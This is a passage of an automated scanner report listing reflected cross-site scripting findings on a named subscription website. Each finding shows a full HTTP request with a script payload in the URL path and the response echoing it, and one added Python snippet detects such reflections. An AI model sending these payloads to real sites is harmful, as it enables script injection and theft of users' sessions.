Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com is not found !</p>
...[SNIP]...

1.204. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9362f<script>alert(1)</script>b77e8849252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 is not found !</p>
...[SNIP]...

1.205. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ab24<script>alert(1)</script>620cae9ac81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:26 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com is not found !</p>
...[SNIP]...
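
The detection method that the issue details above describe in prose (a marker bracketed by unique delimiters, a hit only when it comes back unmodified between tags, and a result that is only visible once the redirect has been followed), as an added Python example. This is not code from the report or from the scanner that produced it; the two-hop redirect chain it works on is constructed from finding 1.205, since the intermediate response is not shown in the report.

```python
import html
from typing import NamedTuple, Optional, Sequence, Tuple

# The marker the scanner used in every finding of this report.
MARKER = "<script>alert(1)</script>"


class Hop(NamedTuple):
    """One response in a redirect chain (status code and body only)."""
    status: int
    body: str


def build_payload(prefix: str, suffix: str, marker: str = MARKER) -> str:
    """Bracket the marker with unique delimiters so a match cannot be accidental."""
    return f"{prefix}{marker}{suffix}"


def classify_reflection(body: str, prefix: str, suffix: str, marker: str = MARKER) -> str:
    """How the canary came back: 'unmodified', 'encoded', 'stripped', 'mangled' or 'absent'."""
    if prefix + marker + suffix in body:
        return "unmodified"   # raw <script> between tags: what the report rates Certain
    for escaped in (html.escape(marker), html.escape(marker, quote=False)):
        if prefix + escaped + suffix in body:
            return "encoded"  # entity-encoded: harmless in a text-between-tags context
    if prefix + suffix in body:
        return "stripped"     # the tags were filtered but the delimiters survived
    if prefix in body or suffix in body:
        return "mangled"      # partially reflected: review by hand
    return "absent"


def first_reflecting_hop(chain: Sequence[Hop], prefix: str, suffix: str,
                         marker: str = MARKER) -> Tuple[Optional[int], str]:
    """Index and verdict of the first hop that reflects the canary; (None, 'absent') if none does.

    Looking only at chain[0] reproduces the false negative the report warns about:
    the echo is in the response after the redirect, so the chain must be followed.
    """
    for index, hop in enumerate(chain):
        verdict = classify_reflection(hop.body, prefix, suffix, marker)
        if verdict != "absent":
            return index, verdict
    return None, "absent"


# Constructed sample shaped like finding 1.205: an intermediate redirect with an
# empty body, then the 200 error page that echoes the full request path in a <p>.
PREFIX, SUFFIX = "7ab24", "620cae9ac81"
PAYLOAD = build_payload(PREFIX, SUFFIX)
TARGET = "/Netsparker2cbd166ae342433790df4a67a21c6752.com"
SAMPLE_CHAIN = [
    Hop(302, ""),
    Hop(200, '<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;">'
             f' Campaign url /FTcontrol{PAYLOAD}{TARGET} is not found !</p>'),
]
# The same page as it would look with output encoding in place.
SAFE_BODY = SAMPLE_CHAIN[1].body.replace(PAYLOAD, html.escape(PAYLOAD))

if __name__ == "__main__":
    print(first_reflecting_hop(SAMPLE_CHAIN[:1], PREFIX, SUFFIX))  # (None, 'absent')
    print(first_reflecting_hop(SAMPLE_CHAIN, PREFIX, SUFFIX))      # (1, 'unmodified')
    print(classify_reflection(SAFE_BODY, PREFIX, SUFFIX))          # encoded
```

When reproducing a finding by hand, the same distinction applies: a client that stops at the 302 (curl without -L, or an HTTP library with redirects disabled) reports the canary as absent, and an "encoded" verdict means the sink is safe for this context even though the delimiters are visible in the page.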

1.206. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34af4<script>alert(1)</script>8e3cba28bfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa is not found !</p>
...[SNIP]...

1.207. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad7a3<script>alert(1)</script>f0d43520fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 567
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php is not found !</p>
...[SNIP]...

1.208. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 541de<script>alert(1)</script>0fa643ff5f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 is not found !</p>
...[SNIP]...

1.209. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3ee7<script>alert(1)</script>3a4ccd97f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:31 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 is not found !</p>
...[SNIP]...

1.210. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7d38<script>alert(1)</script>435d834ccc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a is not found !</p>
...[SNIP]...

1.211. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3dbd6<script>alert(1)</script>b142582d6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 815
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e is not found !</p>
...[SNIP]...

1.212. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edb49<script>alert(1)</script>7c6a1db1dd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:05 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc is not found !</p>
...[SNIP]...

1.213. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b9da<script>alert(1)</script>ebdba01c549 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:59 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 816
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549 is not found !</p>
...[SNIP]...

1.214. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4025e<script>alert(1)</script>69034f81869 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com is not found !</p>
...[SNIP]...

1.215. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c90b<script>alert(1)</script>453c69189e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 is not found !</p>
...[SNIP]...

1.216. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
